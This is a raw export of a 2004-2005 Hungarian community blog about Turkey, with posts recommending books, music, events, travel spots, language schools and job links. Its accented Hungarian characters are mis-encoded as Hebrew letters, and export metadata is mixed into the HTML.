NֹPEK" <br /></span><span style="font-size:85%;">KNOS IGNֱC: TײRײK NֹPKײLTֹS</span></p><div align="center"><div align="justify"><div align="justify"><div align="justify"><span style="font-size:85%;">ROSTOVֱNYI ZSOLT: AZ ISZLֱM VILֱG ֹS A NYUGAT </span></div><div align="justify"><span style="font-size:85%;">TAKֱTS SֱNDOR: BAJVֽV׃ MAGYAROK - kיpek a tצrצk vilבgbףl</span></div><div align="justify"><span style="font-size:85%;">LENGYEL DֹNES: MONDֱK A TײRײK VILֱGB׃L ֹS A KURUC KORB׃L</span></div><div align="justify"><span style="font-size:85%;">FLESCH ISTVֱN: ATATRK ֹLETE ֹS KORA</span></div><div align="justify"><span style="font-size:85%;"><span style="font-size:85%;">BUDAPEST</span><span style="font-size:85%;"> tצrצkl</span></span></div><div align="justify"><span style="font-size:85%;">A 100 legjobb tצrצk recept</span></div><div align="justify"><span style="font-size:85%;">Adorjבn Imre: Tצrצk mesיk</span></div><div align="justify"><span style="font-size:85%;">Csבki ֹva: Magyar-tצrצk יs tצrצk-magyar szףtבr</span></div><div align="justify"><span style="font-size:85%;">Fodor Pבl: A szultבn יs az aranyalma</span></div><div align="justify"><span style="font-size:85%;">Benderli-Glen-Kakuk-Tasnבdi: j magyar-tצrצk szףtבr</span></div><div align="justify"><span style="font-size:85%;">Kenessey Mבria: Tצrצk nyelvtan יs tבrsalgבs</span></div><div align="justify"><span style="font-size:85%;">Tצrצk kapd elő</span></div><div align="justify"><span style="font-size:85%;">Klein Magda: Magyarok tצrצk fצldצn</span></div><div align="center"> <br /><span style="font-size:85%;color:#000000;"><strong>On-line olvashatף:</strong></span></div><strong><span style="font-size:85%;"><div align="center"> <br /></div></span></strong><div align="justify"><strong><a href="http://mek.oszk.hu/01800/01885/html/"><span style="font-size:85%;color:#3366ff;">Kereszt יs fיlhold - a tצrצk kor Magyarorszבgon (1526 - 1699)</span></a></strong><span style="font-size:85%;"><span style="color:#009900;"> </span>Magyar Elektronikus Kצnyvtבr <span style="color:#ff0000;"><span style="color:#000000;">(ajבnlom mindenkinek, kitűnő olvasmבny, nagyon szיp fellet, szבmos kifejezיs kereshető benne)</span> </span></span></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="font-size:85%;"> <br />... valamint a <strong><a href="http://www.terebess.hu/keletkultinfo/index.html">Terebess Kiadף Virtuבlis Kצnyvtבrבban</a></strong> talבlhatף szבmos kצnyv.</span></div></div></div></div> -false - - - - -Efendi - -2004-06-05T16:39:58+02:00 -2004-08-01T01:36:58Z -2004-06-05T15:52:08Z - -tag:blogger.com,1999:blog-7074887.post-108645072815145528 -Lemezajבnlף -<div align="justify"><strong><span style="font-size:85%;">1. Cay Taylan "SU" </span><a href="http://www.mancs.hu/index.php?gcPage=/public/hirek/szam&id=400&amp;mode2=1&mode3=1"><span style="font-size:85%;">kritika:</span></a></strong><span style="font-size:85%;"> Magyar Narancs </span><a href="http://www.soulseduction.com/common/item_detail.php?ItemID=134019"><span style="font-size:85%;">belehallgat</span></a><span style="font-size:85%;">: soulseduction.com <br /> <br /><strong>2. Arasinda Egyttes: <a href="http://www.arasinda.hu/lemez.htm">BֱRKI IS LֹGY</a></strong> </span></div><span style="font-size:85%;"><div align="center"></span> <br /><a href="http://photos1.blogger.com/img/284/1037/640/arasinda2.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/320/arasinda2.jpg" border="0" /></a> </div><div align="justify"> <br /><strong><span style="font-size:85%;">3. Kobzos Kiss Tamבs - Erdal Salikoglu: </span><a href="http://www.etnofon.hu/kobzosszivetekben.htm"><span style="font-size:85%;">SZֽVETEKBEN ŐRIZZETEK</span></a></strong> <br /> <br /></div><div align="center"><a href="http://photos1.blogger.com/img/284/1037/640/kobzos2.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/320/kobzos2.jpg" border="0" /></a> <br /></div><div align="justify"><strong><span style="font-size:85%;"> <br />4. Sipos Jבnos: </span><a href="http://www.hungaroton.hu/classic/eng_info.php?info=1235&vez=f"><span style="font-size:85%;">FOLK TUNES FROM THE TWO SIDES OF THE CAUCASUS</span></a></strong><span style="font-size:85%;"> - karacsבj,balkבr, avar יs azeri nיpzene. A tצrצk zenei gyűjtemיnyekről magyarul olvashatף </span><a href="http://www.mmhir.hu/org/dir065/keleti/keletifolap.html"><span style="font-size:85%;">itt</span></a><span style="font-size:85%;"> <br /> <br /><strong>5. Kecskיs egyttes: <a href="http://www.hungaroton.hu/classic/info.php?info=585&amp;vez=k">RֹGI TײRײK ZENE EUR׃PֱBAN</a></strong> (XVI-XVIII. szבzad) <br /> <br /><strong>6. Cemal Resid Rey: <a href="http://www.hungaroton.hu/classic/info.php?info=1191&vez=r">LE CONQUֹRANT (FATIH) INSTANTANֹS SCENES TURQUES</a></strong> - vezיnyel: Cem Mansur <br /> <br /><strong>7. Cemal Resid Rey- Ahmet Adnan Saygun: <a href="http://www.hungaroton.hu/classic/info.php?info=407&amp;vez=r">TײRײK ZENEKARI MŰVEK</a></strong>- Isin Gyer (mezzoszoprבn)- vezיnyel: Hikmet Simsek <br /> <br /><strong>8. Necil Kazim Akses:<a href="http://www.hungaroton.hu/classic/info.php?info=18&vez=a">KAMARAZENE TײRײKORSZֱGB׃L</a> 2.</strong>- Ycelen Vonףsnיgyes <br /> <br /><strong>9. Bartףk Bיla <a href="http://www.hungaroton.hu/classic/info.php?info=989&amp;vez=b">TײRײK NֹPZENEI GYŰJTֹSE</a></strong> Bartףk םrבsa gyűjtőתtjבrףl magyarul </span><a href="http://www.terebess.hu/keletkultinfo/bartok.html"><span style="font-size:85%;">itt</span></a><span style="font-size:85%;"> <br /> <br /><strong>10. Ulvi Cemal Erkin: <a href="http://www.hungaroton.hu/classic/info.php?info=162&vez=e">MŰVEK SZ׃L׃ ZONGORֱRA</a></strong> - Verda Erman (zongora) <br /> <br /><strong>11. Ulvi Cemal Erkin - Nevit Kodalli: <a href="http://www.hungaroton.hu/classic/info.php?info=164&amp;vez=e">ZONGORAײTײS (Erkin) 11 ZONGORADARAB (Erkin) ZONGORAײTײS (Kodalli)- </a></strong>Deniz Arman Gelenbe (zongora)- Haydn Vonףsnיgyes <br /> <br /><strong>12. Ulvi Cemal Erkin - Nevit Kodalli - Ilhan Usmanbas: <a href="http://www.hungaroton.hu/classic/info.php?info=600&vez=e">KAMARAZENE TײRײKORSZֱGB׃L</a> 1.</strong> - Ankarai Vonףsnיgyes <br /> <br /><strong>13. Ulvi Cemal Erkin - Ahmed Adnan Saygun: <a href="http://www.hungaroton.hu/classic/info.php?info=445&amp;vez=e">VON׃SNֹGYESEK</a></strong> - Anatףliai Vonףsnיgyes <br /> <br /><strong>14. Yunus Emre - Mevlana (Mev&shy;lב&shy;nב Dzselבleddםn Rתmם): <a href="http://www.hungaroton.hu/classic/info.php?info=719&vez=e">YUNUS EMRE ֹS MEVLANA DALAI</a></strong> - Esin Afsar (יnek) <br /> <br /><strong>15. Ahmed Adnan Saygun: <a href="http://www.hungaroton.hu/classic/keresfull.php?info=446&amp;kereses=Saygun">YUNUS EMRE ORAT׃RIUM</a></strong> - vezיnyel: Hikmet Simsek </span><a href="http://mssf.bilkent.edu.tr/eng/adnan.htm"><span style="font-size:85%;">olvasnivalף Saygunrףl itt </span></a><span style="font-size:85%;">יs </span><a href="http://www.lauder.hu/~judarchivum/tanart/tmaria/sziren.doc"><span style="font-size:85%;">itt magyarul</span></a><span style="font-size:85%;"> <br /> <br /><strong>16. <a href="http://www.hungaroton.hu/classic/keresfull.php?info=576&kereses=Saygun">KֲTIBIM - VARIֱCI׃K EGY RֹGI ISZTAMBULI NֹPDALRA</a></strong> (Ruhi Ayangil, Ahmed Adnan Saygun, Cemal Resid Rey) <br /> <br /><strong>17. Sipos Jבnos: <a href="http://www.folkline.hu/kiadvanyok/index.html">BART׃K NYOMֱBAN ANAT׃LIֱBAN - 2.</a></strong> megvבsבrolhatף </span><a href="http://www.fono.hu/?page=records&amp;content=katalogus_item&lang=hu&amp;id=114"><span style="font-size:85%;">itt</span></a><span style="font-size:85%;">, az anatףliai gyűjtיsről a szerző םrבsa </span><a href="http://www.mmhir.hu/org/dir065/keleti/anatolia.html"><span style="font-size:85%;">itt</span></a><span style="font-size:85%;"> <br /> <br /><strong>18. <a href="http://www.dvdworld.co.uk/product_body.asp?pf_id=72518">Mozart in Turkey</a></strong> - DVD, 2004 <br /></div></span> -false - - - - -Efendi - -2004-05-31T15:49:18+02:00 -2004-07-23T20:44:18Z -2004-05-31T13:55:04Z - -tag:blogger.com,1999:blog-7074887.post-108601170439486596 -Terebess ֱzsia E-Tבr - -
    -
    Minden lבtogatףnak ajבnlom, hogy nיzzen be a Terebess Kiadף virtuבlis kצnyvtבrבba, amely hihetetlenl gazdag, magyar nyelvű anyagot tartalmaz Tצrצkorszבg tצrtיnelmיről, kultתrבjבrףl, az iszlבmrףl, a magyar-tצrצk kapcsolatokrףl, de a tצrצk konyhבrףl is. -
    -
    -
    -
    -
    -false -
    - - - -Efendi - -2004-05-26T14:14:00+02:00 -2005-03-14T18:01:20Z -2004-05-26T12:19:36Z - -tag:blogger.com,1999:blog-7074887.post-108557397683092146 -Tצrצkorszבgi magyar programok/Tצrצkorszבgban יlő magyarok talבlkozףhelye -<div align="center"><span style="color:#ff0000;">FONTOS:</span> <strong><a href="http://www.election.hu/ovi/hu/2004-92tv.html">A KLFײLDײN TײRTֹNŐ SZAVAZֱS ֱTMENETI SZABֱLYAI</a></strong></div><div align="center"><br /></div><div align="center"></div><div align="center"></div><div align="center"><img src="http://photos1.blogger.com/img/284/1037/400/PICT0044.jpg" /></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="justify"></div><div align="center"><br /></div><div align="justify"></div><div align="justify"></div><div align="center"><span style="font-size:130%;color:#ff0000;">2004.</span></div><span style="font-size:130%;color:#ff0000;"></span><div align="justify"><br /><span style="color:#000000;"><strong>2004. szept. 20-26.</strong> V. <a href="http://www.tdk.gov.tr/kurultay/program.html">Trk Dili Kurultayi</a>, Baski Imre, Csבki ֹva, Hazai Gyצrgy, Kincses Nagy ֹva, Tasnבdi Edit יs Tatבr Mבria előadבsa, helyszםn: Ankara, Baskent ײgretmen Evi (Besevler) </div></span><p><strong>2004. oktףber 9.</strong> A Rajkף Zenekar fellיpיse a <a href="http://www.merfest.org/home.asp">Mersini Nemzetkצzi Fesztivבlon</a> (2004. szept. 30. - okt. 12.). Helyszםn: Mersin, Kizkalesi, 19.00 ףra, bővebbet a fesztivבl linkjיn</p><p><strong>2004. okt. 4-10.</strong> <a href="http://www.altinportakal.org.tr/anasayfa.php?Sayfa=kisafilm&Altlink=19">Altin Portakal Nemzetkצzi Rצvidfilm Fesztivבl</a>, magyarok versenyfilmjei: Groף Diana: Vahsi Hayal (Wild Imagination), Ujj Mיszבros Kבroly: Lastik Adam (The Rubberman), Kincses Rיka: Emir (The Order)</p><p align="justify"><strong>2004. okt. 1-31.</strong> Nimrףd Antal: <a href="http://www.filmkultura.hu/2003/articles/films/kontroll.hu.html">Kontroll</a> c. cannes-i dםjnyertes filmje bemutatבsra kerl a tצrצkorszבgi <a href="http://www.europeanfilmfestival.com/index.php?ln=tr">Eurףpai Filmfesztivבlon</a> (okt. 1-9. Ankara, okt. 8-14. Bursa, okt. 15-21. Izmir, okt. 22-24. Kars, okt. 25-28. Van, okt. 29-31. Kayseri). Pontos időpontot a fesztivבl linkjיn lehet talבlni. Az ankarai vetםtיs: okt. 4. 19.15 - Megapol (Kizilay).</p><p align="justify"><strong>2004. okt. 18-19.</strong> Magyar filmek az Ankarai Egyetemen (Dil ve Tarih-Cografya Fakltesi, Farabi Salonu) + Halil Tuncer fotףkiבllםtבsa Magyarorszבgrףl.Program: okt.18. 18.00 ףra megnyitף, majd Herendi Gבbor <a href="http://www.valamiamerika.hu/">Valami Amerika</a> c. filmjיnek vetםtיse. Okt. 19. 18.00 ףrakor Fבbri Zoltבn <a href="http://filmtortenet.editor.ivy.hu/object.5cfbe70a-2cd9-4c43-87cb-2c1748db1271.ivy">Magyarok</a> c. filmje. Mindkיt film tצrצk feliratos! Belיpיs szabad, meghםvף, jegy nincs.</p><p align="justify"><strong>2004. nov. 18-30.</strong> <a href="http://www.izmirkisafilm.org/en/">Izmiri Nemzetkצzi Rצvidfilm Fesztivבl </a>- magyar rיsztvevőkkel</p><p align="justify"><strong>2004. nov. 23.</strong> <a href="http://www.osmaniye.gov.tr/anasayfa.html">Osmaniye Folklףrfesztivבl</a> - Bartףk Bיla 1936-os ottani gyűjtיsיről előadבst tart Tasnבdi Edit, talבlkozhattok Kobzos Kiss Tamבssal יs Sezgin Trk tצrצk filmrendezővel, aki elviszi "Bartףk, Tצrצkorszבg, 1936.." c. filmjיt. Jצvőre talבn Bartףk-emlיkhבz is lesz Osmaniyיben.</p><p align="justify"><strong><span style="color:#ff0000;">Helyszםnvבltozבs!</span> 2004. november 27.</strong> A <a href="http://www.jazzpression.hu">Jazzpression</a> fellיpיse az <a href="http://www.acd.org.tr/#">ankarai dzsesszfesztivבlon</a> (nov. 25. -dec. 5.) helyszםn: Faces Live Club, Ankara, a koncert kezdete 22.00 ףra. <strong>Nov. 27-יn reggel 8-kor</strong> a zenekar bemutatkozik a TV8 csatornבn Erkan Tan msorבban. Jegyek a <a href="http://www.biletix.com/">BILETIX</a>-en!</p><p align="justify"><strong>2004. dec. 17.</strong> Szabף Istvבn filmrendező - aki יletmű-dםjat kap - יs Klaus Maria Brandauer 18. 30-kor az isztambuli francia kulturבlis intיzetben. Bővebbet a <a href="http://www.tursak.org.tr/default.asp?Language=EN&amp;Pagecode=000">TRSAK honlapjבn</a> (a tצrצk verziףban).</p> -false - - - - -Efendi - -2004-05-25T11:46:48+02:00 -2005-01-11T19:17:48Z -2004-05-25T09:50:04Z - -tag:blogger.com,1999:blog-7074887.post-108547860473485385 -Utazבsi tanבcsok/Kedvenc tצrצkorszבgi helyeink -<div align="center"><a href="http://photos1.blogger.com/img/284/1037/640/akyaka%20part10.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/400/akyaka%20part10.jpg" border="0" /></a> <br /><span style="font-size:85%;"><em>A Gצkovai-צbצl</em></span> </div><div align="justify"> <br />Ezek azok a helyek, amelyek klצnצsen tetszettek Tצrצkorszבgban. Ha szksיges, םrjבtok le azt is, hogyan lehet eljutni oda. <br /> <br /></div><div align="justify"></div><div align="justify">Jף יs rossz tapasztalataink a tצrצkorszבgi nyaralבsokon. Ajבnlhatunk szבllבst, irodבkat, felhםvhatjuk az utazni kםvבnףk figyelmיt hasznos tudnivalףkra. Konkrיt utazבsi kיrdיseket is feltehettek, valaki majd csak vבlaszol. <br /> <br /><p align="center"><a href="http://www.adiyamanli.org/MapofTurkey/turk_map.htm"><img height="50" alt="Road Map Of Turkey" src="http://www.adiyamanli.org/MapofTurkey/banner/turkey2.gif" width="113" border="0" /></a></p> <br /></div><div align="justify"></div><div align="justify">Ha erre a fenti linkre klikkelsz, rיszletes Tצrצkorszבg-tיrkיpet talבlsz. <br /> <br />Ajבnlok nיhבny magyar oldalt is a tיmבban:</div><div align="justify"></div><div align="justify">- <a href="http://www.metell.hu/">Metell תtibeszבmolףi</a></div><div align="justify">- <a href="http://www.szinhaz.hu/kisseszter/html/trip1.htm">Kiss Eszter utazבsai</a></div><div align="justify">- <a href="http://www.foldiutikalauz.hu/torokorszag/">Fצldi תtikalauz</a></div><div align="justify">- <a href="http://www.holgyvilag.hu/main2.php?pos=1_13_2&cikk=3701">Hצlgyvilבg Terasz</a></div><div align="justify">- <a href="http://members.chello.hu/svrcsek/toroko.htm">Svrcsek benyomבsai</a></div><div align="justify"></div><div align="justify"> </div><div align="justify"> <br /> <br /></div><div align="justify"><em>Egy kedves magyar levelező, Ildi kיrt arra, hogy csinבljak egy kis reklבmot Gצremיben 2004. decembere vיgיn megnyitott panziףjבnak, amelyet tצrצk fיrjיvel műkצdtet. ײrצmmel teszem, nemcsak neki, bבrki mבsnak is, tehבt, <strong>ha Kappadףkiבba utazol keresd Ildi panziףjבt </strong></em><a href="http://www.ufukpension.com.tr/index.htm"><em><strong>EZEN A LINKEN</strong></em></a><em><strong>!</strong></em></div> -false - - - - -Efendi - -2004-05-24T13:00:00+02:00 -2006-01-03T13:32:59Z -2004-05-24T11:07:57Z - -tag:blogger.com,1999:blog-7074887.post-108539687736096182 -Tצrצk fakanבl - -
    -
    Receptek azoknak, akik ennיnek valami jףt.
    -
    -
    - -Simit - -
    -
    -
    -
    -
    -
    -
    -
    Az alבbbi linkeken pedig tצrצk konyhבval kapcsolatos blogokat יs web-oldalakat talבlsz:
    -
    -
    -
    -
    - - - -false - - - - -Efendi - -2004-05-23T01:04:00+02:00 -2006-01-03T13:05:13Z -2004-05-22T22:12:19Z - -tag:blogger.com,1999:blog-7074887.post-108526393980204376 -Az iszlבm - -
    -
    Az iszlבmmal kapcsolatos hozzבszףlבsok postja, Tצrצkorszבgra יs Magyarorszבgra profilםrozva.
    -
    -
    -
    - -Eyup Mosque, Istanbul -
    -
    -
    -
    -
    -Linkajבnlף: -
    -
    -
    -
    -
    - -
    - -
    -
    -
    -
    - -
    -
    - - -
    -Az iszlבm vallבs - magyarul
    -
    -Szayyid Abu-l-A'lב Mawdudi: Az iszlבm alapelvei (Vilבgnיzet יs יlet az iszlבmban)
    -
    - -
    -
    -Germanus Gyula - Kiss Dבvid Sבndor kitűnő oldala
    - - - -
    -Nיmeth Pבl: Az iszlבm (Terebess On-line)
    - - -
    -Vבmbיry ֱrmin (Terebess On-line)
    - - -
    -25 kיrdיs az iszlבmrףl (Terebess On-line)
    -
    -
    -Iszlבm kislexikon (Szegedi Tudomבnyegyetem)
    - - - -
    - - -
    -
    -
    -
    -Alevi, bektasi: -
    -
    -
    -
    -
    - -
    - - - - - - - - - -
    -
    -
    -
    -
    -Szektבk, rendek: -
    -
    -
    -
    -
    -
    - -
    -
    -
    -The Islam Website (University of Georgia)
    - - - - - - - - - - -
    -
    - -false - - - - -Efendi - -2004-05-23T00:13:00+02:00 -2005-03-11T15:27:22Z -2004-05-22T22:24:16Z - -tag:blogger.com,1999:blog-7074887.post-108526465632813028 -Magyar, tצrצk, kיt jףbarבt... -<div align="center"><a href="http://photos1.blogger.com/img/284/1037/1024/tatvan%20crater%20lake5.jpg"><img style="BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; MARGIN: 2px; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid" src="http://photos1.blogger.com/img/284/1037/400/tatvan%20crater%20lake5.jpg" border="0" /></a><br /><span style="font-size:85%;"><em>Tatvan /Nemrut<br /></div></em></span><div align="justify"><br />Aki tapasztalta, hogy a tצrצkצk mennyire magukhoz kצzelבllףnak, testvיreknek, rokonoknak, tekintenek minket, magyarokat, itt megfogalmazhatja vיlemיnyיt arrףl, mi magunk mit tehetnיnk a kapcsolatok erősםtיse יrdekיben.</div><div align="justify"> <br /></div><div align="justify"></div><div align="center"><span style="font-size:130%;color:#ff0000;"><strong>2005. יvi hםrek</strong></span></div><div align="center"> <br /></div><div align="justify"></div><div align="justify"><a href="http://www.uno.hu/news/story/154517">Esztergom tצrצk kapcsolatai</a> - mבrc. 6.</div> -false - - - - -Efendi - -2004-05-22T23:54:00+02:00 -2005-12-19T21:01:59Z -2004-05-22T21:59:15Z - -tag:blogger.com,1999:blog-7074887.post-108526315574138083 -Munka/בllבs/zlet/Eurףpai uniףs בllבsok יs tenderek Tצrצkorszבgban -<div align="justify"><strong>Ebbe a postba םrj:</strong><br /><div align="justify"><br /><div align="justify"><em>ha <strong>munkבt</strong> keresel vagy ajבnlsz,</em></div><div align="justify"><em></em></div><div align="justify"><em>ha <strong>zleti partnert</strong> keresel magyarorszבgi vagy tצrצkorszבgi vבllalkozבshoz,</em></div><div align="justify"><em></em></div><div align="justify"><em>ha olyan <strong>linkeket vagy cםmeket</strong> ismersz, amelyek a tצbbieknek is hasznosak lehetnek,</em></div><div align="justify"><em></em></div><div align="justify"><em>ha a magyarorszבgi vagy tצrצkorszבgi munkavבllalבssal kapcsolatos <strong>informבciףidat</strong> akarod megosztani a blog lבtogatףival.</em></div><div align="justify"><em></em><br /></div><div align="justify"></div><div align="justify">Ha az Eurףpai Bizottsבg ankarai kיpviseletיn szeretnיl dolgozni, az בllבshirdetיseket <a href="http://www.deltur.cec.eu.int/default.asp?pId=13&lang=1&amp;year=2005&mnId=4">EZEN A LINKEN</a> figyelheted.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">A tצrצkorszבgi uniףs tendereket pedig <a href="http://www.deltur.cec.eu.int/default.asp?pId=13&amp;lang=1&year=2005&amp;mnId=2">EZEN A LINKEN</a> talבlod meg.</div><div align="justify"></div><div align="justify"></div></div></div> -false - - - - -Efendi - -2004-05-22T23:39:19+02:00 -2005-01-28T23:50:19Z -2004-05-22T21:46:39Z - -tag:blogger.com,1999:blog-7074887.post-108526239906747355 -Tanuljunk tצrצkl! -<div align="justify">A tצrצkl יs a <a href="http://www.ethnologue.com/show_country.asp?name=Turkey">Tצrצkorszבgban hasznבlt mבs nyelveken</a> tanulףk vagy tanulni kםvבnףk fףruma. Kitől, hol lehet nyelvet tanulni, milyen tankצnyveket יrdemes hasznבlni, on-line lehetősיgek. Hogyan יs mennyiיrt lehet Tצrצkorszבgban kםsיrletezni a nyelvtanulבssal? Ha tudsz ajבnlani tצrצk tanבrt, vagy magad tanםtanבl, םrd meg a postban. </div><div align="justify"></div> <br /><span style="color:#ff0000;"><em>Nyelviskolבk: <br /></em></span> <br /><div align="justify">1. Effy stתdiף, Budapest, Jףzsef kצrתt 2. I. em. 1. tel. (1) 33 44 429 </div><div align="justify">2. BILS Nyelviskola, Bp.V.ker. Bajcsy-Zsilinszky u. 62. III/1. tel: (1) 311-5481</div><div align="justify">3. Duna Millennium, Budapest, Kirבly u. - kiskצrתt sarkבn, tel. (1) 342 15 82</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><span style="color:#ff0000;"><em>Beszerezhető tankצnyvek יs szףtבrak Tצrצkorszבgban:</em></span></div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><a href="http://www.pandora.com.tr/urun.asp?id=106255">Kolay Trkce - kצnyv, 2 CD, 2 kazetta</a> - Skr Meric - FONO (Pandora) vagy <a href="http://www.imgekitabevi.com/product_info.php?cPath=161_162&products_id=6645">itt</a> (sokkal olcsףbban - Imge)</div><div align="justify"><a href="http://www.imgekitabevi.com/product_info.php?cPath=161_162&amp;products_id=7170">Trkחe Konuşmak Istiyorum</a> - Yakup Kavas - ALFA (Imge)</div><div align="justify"><a href="http://www.pandora.com.tr/urun.asp?id=51056">Trkce dilbilgisi</a> - FONO - (Pandora)</div><div align="justify"><a href="http://www.pandora.com.tr/urun.asp?id=52100">Turkish Grammar</a> -Fuad A. Attaoullah - FONO (Pandora)</div><div align="justify"> <br /></div><div align="justify"><span style="color:#ff0000;">Kצnyvet, szףtבrt kereshetsz יs vבsבrolhatsz a PANDORA, az egyik legnagyobb tצrצk on-line kצnyvesbolt honlapjבn</span> <a href="http://www.pandora.com.tr/">EZEN A LINKEN</a>.</div><div align="justify"></div><div align="justify"></div><div align="justify"> <br /><em><span style="color:#ff0000;">On-line tצrצk:</span> <br /> <br /></em><em><a href="http://tarkan.webdomain.hu/torok.html">Tצrצk nyelvleckיk magyarul</a> (Baksa Tםmea)</em><em> </em></div><div align="justify"><a href="http://www.turkishclass.com"><em>Turkish class</em></a></div><div align="justify"><a href="http://www.onlineturkish.com"><em>Online Turkish</em></a></div><div align="justify"><a href="http://users.pandora.be/orientaal/classroom.html#Turkish"><em>Orientaal' Classroom</em></a></div><div align="justify"><a href="http://www2.egenet.com.tr/mastersj/index.html"><em>Egenet</em></a></div><div align="justify"><a href="http://www.tomer.ankara.edu.tr/english/html/utom.html"><em>TײMER</em></a></div><div align="justify"><a href="http://cali.arizona.edu/maxnet/tur"><em>UACALI</em></a></div><div align="justify"><a href="http://www.freewebz.com/turkce"><em>Freewebz</em></a></div><div align="justify"><a href="http://groups.msn.com/englishgirlfriendsofturkishmen"><em>English Girlfriends of Turkish Men</em></a></div><div align="justify"><a href="http://www.princeton.edu/~turkish/"><em>Princeton</em></a></div><div align="justify"><a href="http://www.freewebs.com/kohljanos/index.htm"><em>Kohl Jבnos</em></a></div><div align="justify"><a href="http://groups.yahoo.com/group/turkishlearner/"><em>Turkish Learner</em></a></div><div align="justify"><a href="http://www.cs.bilkent.edu.tr/~guvenir/CATT/"><em>CATT - Computer Aided Turkish Tutor</em></a></div><div align="justify"><a href="http://www.dilimiz.gen.tr/dilbilgisi/imla/imlaklavuzu.html"><em>Helyesםrבs-ellenőrző</em></a></div><div align="justify"><a href="http://www.turkishlanguage.co.uk/index.htm"><em>Manisa Turkish</em></a></div><div align="justify"><a href="http://carla.acad.umn.edu/lctlexercises/turkish/tvtp.html"><em>Minnesota</em></a><em> <br /> <br /></em></div><div align="justify"></div><p><span style="color:#ff0000;"><em>Beszerezhető tankצnyvek יs szףtבrak Magyarorszבgon:</em></span></p><p><a href="http://www.konyvkereso.hu/netacgi/konyvker/index.pl?ln=M&amp;fm=idxm.htm"><em>Magyar-tצrצk יs tצrצk-magyar</em></a> (a megjelenő keresőbe םrd be "magyar-tצrצk szףtבr")</p><p><span style="color:#ff0000;">... tovבbbi nyelvtanulבsi tippeket talבlhatsz itt lent a hozzבszףlבsokban!</span></p> -false - - - - -Efendi - -2004-05-22T22:40:48+02:00 -2004-09-20T21:34:48Z -2004-05-22T20:44:13Z - -tag:blogger.com,1999:blog-7074887.post-108525865341402300 -TֱRSALG׃ - -
    -
    Ide bבrmilyen tיmבban lehet םrni יs a lבtogatףk is itt leveleznek egymבssal (meg a postokon, persze).
    -
    -
    -
    -
    Ha תj postot szeretnיl, םrj, hogy azt milyen tיmבban nyissam meg.
    -
    -
    -
    -
    Ide jצhetnek a hozzבszףlבsok יs az צtletek a torokorszag.lap.hu oldal יs e blog technikai műkצdיsיvel vagy tartalmבval kapcsolatban.
    -
    -
    -
    -
    ֽrd meg, ha a blogon halott linket talבlsz.
    -
    -
    - - -
    -
    -
    -false -
    - - - -Efendi - -2004-05-22T22:14:00+02:00 -2005-03-14T18:12:04Z -2004-05-22T20:25:31Z - -tag:blogger.com,1999:blog-7074887.post-108525753147883639 -Tצrצk hבzastבrs - 2004. - -
    -
    -Ez a post a 2004. יvi hozzבszףlבsokat tartalmazza, ha olvasni akarod azokat, klikkelj a "182 comments" linkre itt lent jobb oldalon . A 2005. januבr 4. utבni hozzבszףlבsok a "Tצrצk hבzastבrs - 2005." poston vannak, - -ITT! - -
    -
    -
    -false -
    - - - -Efendi - -2004-05-22T18:28:00+02:00 -2005-03-14T18:50:48Z -2004-05-22T16:46:09Z - -tag:blogger.com,1999:blog-7074887.post-108524436969052091 -A blogrףl יs arrףl, Te hogyan םrhatsz bele -<div align="justify">Ez a blog a <strong><a href="http://torokorszag.lap.hu/">torokorszag.lap.hu</a></strong> <a href="http://www.startlap.com/">startlap</a> aloldal olvasףinak יs Tצrצkorszבg barבtainak fףruma, amelyet azיrt kיszםtettem, hogy a lap lבtogatףi יs a szerkesztő kapcsolatot teremthessenek egymבssal. Itt nem is elsősorban a laprףl beszיlhetnיnk, hanem magבrףl Tצrצkorszבgrףl, amelynek valamennyien mבs-mבs arcait ismerjk. Mindannyiunknak vannak a tצbbiek szבmבra hasznos צtletei, javaslatai vagy informבciףi, ezeket a blogon megoszthatjuk egymבssal. Szםvesen vבlaszolok minden, a tצbbi lבtogatףt is יrdeklő kיrdיsre, vagy felrakok erre az oldalra olyan informבciףkat, amelyek ismertetיsיre a torokorszag.lap.hu oldal - jellegיnיl fogva - nem alkalmas. A blogokat בltalבban egyvalaki, a szerkesztő םrja. Ez egy mבsfajta blog: azt szeretnיm, ha inkבbb Ti, a lבtogatףk םrnבtok, םgy talבn יrdekesebb lesz. Valamennyink nevיben kצszצnצm. Klצn kצszצnet Ali Babבnak, aki barבtsבgbףl a sportrovatot szerkeszti!</div><p align="justify"><span style="color:#ff0000;">A blog szerkezete</span></p><p align="justify">A blog tיmבkbףl (postokbףl) בll. A post kיt fő rיsze a tצrzsszצveg, amit יn םrok, valamint a vיlemיnyek (comments), amelyeket Ti magatok el tudtok elhelyezni a blogon a kצzreműkצdיsem nיlkl. Postot technikailag csak יn tudok lיtrehozni. Ha Te szeretnיl תj postot javasolni, kezdemיnyezd azt a "<a href="http://torokorszag.blogspot.com/2004/05/trsalg.html">Tבrsalgף</a>" postban. </p><p align="justify"><span style="color:#ff0000;">Kצzlekedיs a blogon</span></p><p align="justify"><span style="color:#ff0000;">1. lehetősיg:</span> Ha a főoldalt gצrgeted lefelי, minden postot elolvashatsz. (A lבtogatףk kommentבrjait nem, azok olvasבsבhoz minden post vיgיn a "comments" linkekre kell klikkelned. Ali Baba sportbeszבmolףit szintיn a "comments" linkre kattintva lבthatod.) Minיl tצbb anyag lesz a blogon, ez a lehetősיg annבl kיnyelmetlenebb.</p><p align="justify"><span style="color:#ff0000;">2. lehetősיg:</span> Pillanatnyilag ez a legjobb. A főoldal tetejיn lיvő "Tartalomjegyzיk" minden postot felsorol link formבban. 